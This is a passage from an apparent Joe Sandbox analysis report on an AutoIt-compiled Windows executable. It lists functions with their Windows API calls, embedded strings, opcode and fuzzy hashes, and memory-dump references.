                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                              • String ID: @$ThumbnailClass
                                                              • API String ID: 1788623398-1539354611
                                                              • Opcode ID: 566360adadff852b8a8c82b5ecef77c827db6965bb6fbc0ac8eb50abe1dbfd13
                                                              • Instruction ID: 445bf8017bdfa678a0bd479bfa399914ac789eb2041c595c053765502d900131
                                                              • Opcode Fuzzy Hash: 566360adadff852b8a8c82b5ecef77c827db6965bb6fbc0ac8eb50abe1dbfd13
                                                              • Instruction Fuzzy Hash: 2D81BF310083859FDB01DF11D981FAA7BE8EF84354F14846AFD8A9B096EB34DE45CBA1
                                                              Function 00AED6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                              • API String ID: 1038674560-1810252412
                                                              • Opcode ID: 35be394e7a1cd1461720f810a3bad88838a6369a4006b8633c5973a796aa5d46
                                                              • Instruction ID: dcb23e3b2eca0f6304b0da5956c42082a154eef4c53ba9088986ba4b6914148c
                                                              • Opcode Fuzzy Hash: 35be394e7a1cd1461720f810a3bad88838a6369a4006b8633c5973a796aa5d46
                                                              • Instruction Fuzzy Hash: F0314B31A48645AAEB14FB61DE53FEDB3B9DF20754F20016AF442B20E2EB65AE04C651
                                                              Function 00AEEA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadIconW.USER32(00000063), ref: 00AEEAB0
                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00AEEAC2
                                                              • SetWindowTextW.USER32(?,?), ref: 00AEEAD9
                                                              • GetDlgItem.USER32(?,000003EA), ref: 00AEEAEE
                                                              • SetWindowTextW.USER32(00000000,?), ref: 00AEEAF4
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00AEEB04
                                                              • SetWindowTextW.USER32(00000000,?), ref: 00AEEB0A
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00AEEB2B
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00AEEB45
                                                              • GetWindowRect.USER32(?,?), ref: 00AEEB4E
                                                              • SetWindowTextW.USER32(?,?), ref: 00AEEBB9
                                                              • GetDesktopWindow.USER32 ref: 00AEEBBF
                                                              • GetWindowRect.USER32(00000000), ref: 00AEEBC6
                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00AEEC12
                                                              • GetClientRect.USER32(?,?), ref: 00AEEC1F
                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00AEEC44
                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00AEEC6F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                              • String ID:
                                                              • API String ID: 3869813825-0
                                                              • Opcode ID: 8472da163317f0de0b72e5525dc498e893873d097bb1c99fa86f36338442a073
                                                              • Instruction ID: ec94452206505f1ae379c2f4d4c44cbabefaf1671dffc5e321659e7918a84451
                                                              • Opcode Fuzzy Hash: 8472da163317f0de0b72e5525dc498e893873d097bb1c99fa86f36338442a073
                                                              • Instruction Fuzzy Hash: 6A516B71900749EFDB20DFA9DD8AA6EBBF5FF04705F104928E596A35A0CB74A944CB10
                                                              Function 00B079B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00B079C6
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00B079D1
                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00B079DC
                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00B079E7
                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00B079F2
                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00B079FD
                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00B07A08
                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00B07A13
                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00B07A1E
                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00B07A29
                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00B07A34
                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00B07A3F
                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00B07A4A
                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00B07A55
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00B07A60
                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00B07A6B
                                                              • GetCursorInfo.USER32(?), ref: 00B07A7B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Cursor$Load$Info
                                                              • String ID:
                                                              • API String ID: 2577412497-0
                                                              • Opcode ID: 6eccfe2ebe7f5368e2b823b703bb768094d786aed5529ada1dac8563f02ccfc3
                                                              • Instruction ID: eeab9cd761c1d264d6b1392697347763e4e54954e04f8588278d5140f339830e
                                                              • Opcode Fuzzy Hash: 6eccfe2ebe7f5368e2b823b703bb768094d786aed5529ada1dac8563f02ccfc3
                                                              • Instruction Fuzzy Hash: 4E3107B1E4831A6ADB109FB69C8995FFFE8FF04750F50452AE50DE7280DE78A5008FA1
                                                              Function 00ABC833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00ABC8B7,?,00002000,?,?,00000000,?,00AB419E,?,?,?,00B4DC00), ref: 00ACE984
                                                                • Part of subcall function 00AB660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB53B1,?,?,00AB61FF,?,00000000,00000001,00000000), ref: 00AB662F
                                                              • __wsplitpath.LIBCMT ref: 00ABC93E
                                                                • Part of subcall function 00AD1DFC: __wsplitpath_helper.LIBCMT ref: 00AD1E3C
                                                              • _wcscpy.LIBCMT ref: 00ABC953
                                                              • _wcscat.LIBCMT ref: 00ABC968
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00ABC978
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00ABCABE
                                                                • Part of subcall function 00ABB337: _wcscpy.LIBCMT ref: 00ABB36F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                              • API String ID: 2258743419-1018226102
                                                              • Opcode ID: b56bb9653bccc82bd7ecc852dd40d9d2ceddd526f5ae5a849027dae8fbac227d
                                                              • Instruction ID: 810698f8ee585a144f097a3d240f5a6aa0628e4222c37c32e317384cba2001a6
                                                              • Opcode Fuzzy Hash: b56bb9653bccc82bd7ecc852dd40d9d2ceddd526f5ae5a849027dae8fbac227d
                                                              • Instruction Fuzzy Hash: EB128C715083419FC724EF64C981EAFBBE9BF98710F00495EF58A93262DB34DA49CB52
                                                              Function 00B1CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00B1CEFB
                                                              • DestroyWindow.USER32(?,?), ref: 00B1CF73
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B1CFF4
                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B1D016
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B1D025
                                                              • DestroyWindow.USER32(?), ref: 00B1D042
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AB0000,00000000), ref: 00B1D075
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B1D094
                                                              • GetDesktopWindow.USER32 ref: 00B1D0A9
                                                              • GetWindowRect.USER32(00000000), ref: 00B1D0B0
                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B1D0C2
                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B1D0DA
                                                                • Part of subcall function 00ACB526: GetWindowLongW.USER32(?,000000EB), ref: 00ACB537
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                              • String ID: 0$tooltips_class32
                                                              • API String ID: 3877571568-3619404913
                                                              • Opcode ID: 45b4e91242118a9011b5419839ed5d1882878adf83b9a71aec05642f088c4dba
                                                              • Instruction ID: 3a0f794f8a084306da7b82ab8a75fc6c15a5ce3479b4dd100dc4cbd2f5286879
                                                              • Opcode Fuzzy Hash: 45b4e91242118a9011b5419839ed5d1882878adf83b9a71aec05642f088c4dba
                                                              • Instruction Fuzzy Hash: 5871D174150305AFD720CF28CC99FAA77E5EB8C704F544A5DF985872A1DB74E982CB22
                                                              Function 00B1F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                              • DragQueryPoint.SHELL32(?,?), ref: 00B1F37A
                                                                • Part of subcall function 00B1D7DE: ClientToScreen.USER32(?,?), ref: 00B1D807
                                                                • Part of subcall function 00B1D7DE: GetWindowRect.USER32(?,?), ref: 00B1D87D
                                                                • Part of subcall function 00B1D7DE: PtInRect.USER32(?,?,00B1ED5A), ref: 00B1D88D
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00B1F3E3
                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B1F3EE
                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B1F411
                                                              • _wcscat.LIBCMT ref: 00B1F441
                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B1F458
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00B1F471
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00B1F488
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00B1F4AA
                                                              • DragFinish.SHELL32(?), ref: 00B1F4B1
                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B1F59C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                              • API String ID: 169749273-3440237614
                                                              • Opcode ID: 3c2ab0307464f9dacaa5861881b7a2f382ec40ec166854de4f87d96cc2546be7
                                                              • Instruction ID: 72bbfa29ef38b73a20aca48ef497e93ed0c6178cd53db77ecebbc0b193749202
                                                              • Opcode Fuzzy Hash: 3c2ab0307464f9dacaa5861881b7a2f382ec40ec166854de4f87d96cc2546be7
                                                              • Instruction Fuzzy Hash: B5613775108301AFC301EF64DC86EAFBBE8FB89710F504A1EB595932A1DB70DA59CB52
                                                              Function 00AFAAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantInit.OLEAUT32(00000000), ref: 00AFAB3D
                                                              • VariantCopy.OLEAUT32(?,?), ref: 00AFAB46
                                                              • VariantClear.OLEAUT32(?), ref: 00AFAB52
                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00AFAC40
                                                              • __swprintf.LIBCMT ref: 00AFAC70
                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 00AFAC9C
                                                              • VariantInit.OLEAUT32(?), ref: 00AFAD4D
                                                              • SysFreeString.OLEAUT32(00000016), ref: 00AFADDF
                                                              • VariantClear.OLEAUT32(?), ref: 00AFAE35
                                                              • VariantClear.OLEAUT32(?), ref: 00AFAE44
                                                              • VariantInit.OLEAUT32(00000000), ref: 00AFAE80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                              • API String ID: 3730832054-3931177956
                                                              • Opcode ID: 656e3972a41f99ebddd4b44c9875ead2b42f7698519f046bbb37127fc709c1ce
                                                              • Instruction ID: 3e873798e9c30e2c2c25b9e6327066dc577e77cfacf69d2eae772c3b829c0860
                                                              • Opcode Fuzzy Hash: 656e3972a41f99ebddd4b44c9875ead2b42f7698519f046bbb37127fc709c1ce
                                                              • Instruction Fuzzy Hash: C3D1CFB1604119DBDB24AFE5D884BFAB7B5BF14700F248495F60D9B281DB74EC40DBA2
                                                              Function 00B1716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 00B171FC
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B17247
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                              • API String ID: 3974292440-4258414348
                                                              • Opcode ID: ed723b9ed4183ae85f51b149e5ec1619bbd12ad2b69b57fc44afe75ceb3cf5a5
                                                              • Instruction ID: f772d2b4a5036d5029913155995cf5f51e0f3d50b95c1383f1eb276ea86d2f75
                                                              • Opcode Fuzzy Hash: ed723b9ed4183ae85f51b149e5ec1619bbd12ad2b69b57fc44afe75ceb3cf5a5
                                                              • Instruction Fuzzy Hash: 95916D302487019BCB04EF10C991AAEB7E5AF95310F55489DF8966B3A3DF34ED4ACB81
                                                              Function 00B1E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B1E5AB
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00B1BEAF), ref: 00B1E607
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B1E647
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B1E68C
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B1E6C3
                                                              • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00B1BEAF), ref: 00B1E6CF
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B1E6DF
                                                              • DestroyIcon.USER32(?,?,?,?,?,00B1BEAF), ref: 00B1E6EE
                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B1E70B
                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B1E717
                                                                • Part of subcall function 00AD0FA7: __wcsicmp_l.LIBCMT ref: 00AD1030
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                              • String ID: .dll$.exe$.icl
                                                              • API String ID: 1212759294-1154884017
                                                              • Opcode ID: 42689072b4f92abb8ca427e0533f9e0dadf03587a30fe363e2cffa608ec0788a
                                                              • Instruction ID: 5c0559fc80e7632bc8dcdc2d50fab44f2764911c70f70ffc5a1163dd5253dd4e
                                                              • Opcode Fuzzy Hash: 42689072b4f92abb8ca427e0533f9e0dadf03587a30fe363e2cffa608ec0788a
                                                              • Instruction Fuzzy Hash: 5B61DE71500215BAEB24DF64DD82FEE7BA8FB18724F604155F921E71D1EB70E980CBA0
                                                              Function 00AFD219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              • CharLowerBuffW.USER32(?,?), ref: 00AFD292
                                                              • GetDriveTypeW.KERNEL32 ref: 00AFD2DF
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AFD327
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AFD35E
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AFD38C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                              • API String ID: 1148790751-4113822522
                                                              • Opcode ID: 9fd86edf186bc87068cd945eb3d1f909639bc0e1a1bc477c81ce1fcb5e30b693
                                                              • Instruction ID: 0f10f800b05257f6af75facb041185a0676085c70d5bc35b1abc10623d4747d0
                                                              • Opcode Fuzzy Hash: 9fd86edf186bc87068cd945eb3d1f909639bc0e1a1bc477c81ce1fcb5e30b693
                                                              • Instruction Fuzzy Hash: 9A5149715042049FC700EF20C981AAEB7F9EF88758F10495CF995672A2DB31EE05CB82
                                                              Function 00AF26BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00B23973,00000016,0000138C,00000016,?,00000016,00B4DDB4,00000000,?), ref: 00AF26F1
                                                              • LoadStringW.USER32(00000000,?,00B23973,00000016), ref: 00AF26FA
                                                              • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00B23973,00000016,0000138C,00000016,?,00000016,00B4DDB4,00000000,?,00000016), ref: 00AF271C
                                                              • LoadStringW.USER32(00000000,?,00B23973,00000016), ref: 00AF271F
                                                              • __swprintf.LIBCMT ref: 00AF276F
                                                              • __swprintf.LIBCMT ref: 00AF2780
                                                              • _wprintf.LIBCMT ref: 00AF2829
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AF2840
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                              • API String ID: 618562835-2268648507
                                                              • Opcode ID: 50b425927d157848b07a891ccee2b308cbdd404bb2bcf5467ce3792580db8ed3
                                                              • Instruction ID: 1b6c2a0d31bf81540c839866fbf454601a1597c509879d74602c6120f8c931f3
                                                              • Opcode Fuzzy Hash: 50b425927d157848b07a891ccee2b308cbdd404bb2bcf5467ce3792580db8ed3
                                                              • Instruction Fuzzy Hash: BC413C72800219BACB14FBE4DE86EEEB77CAF14740F100165F60273092EA746F49DBA1
                                                              Function 00AFD0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AFD0D8
                                                              • __swprintf.LIBCMT ref: 00AFD0FA
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00AFD137
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00AFD15C
                                                              • _memset.LIBCMT ref: 00AFD17B
                                                              • _wcsncpy.LIBCMT ref: 00AFD1B7
                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00AFD1EC
                                                              • CloseHandle.KERNEL32(00000000), ref: 00AFD1F7
                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00AFD200
                                                              • CloseHandle.KERNEL32(00000000), ref: 00AFD20A
                                                              Strings
                                                              Memory Dump Source
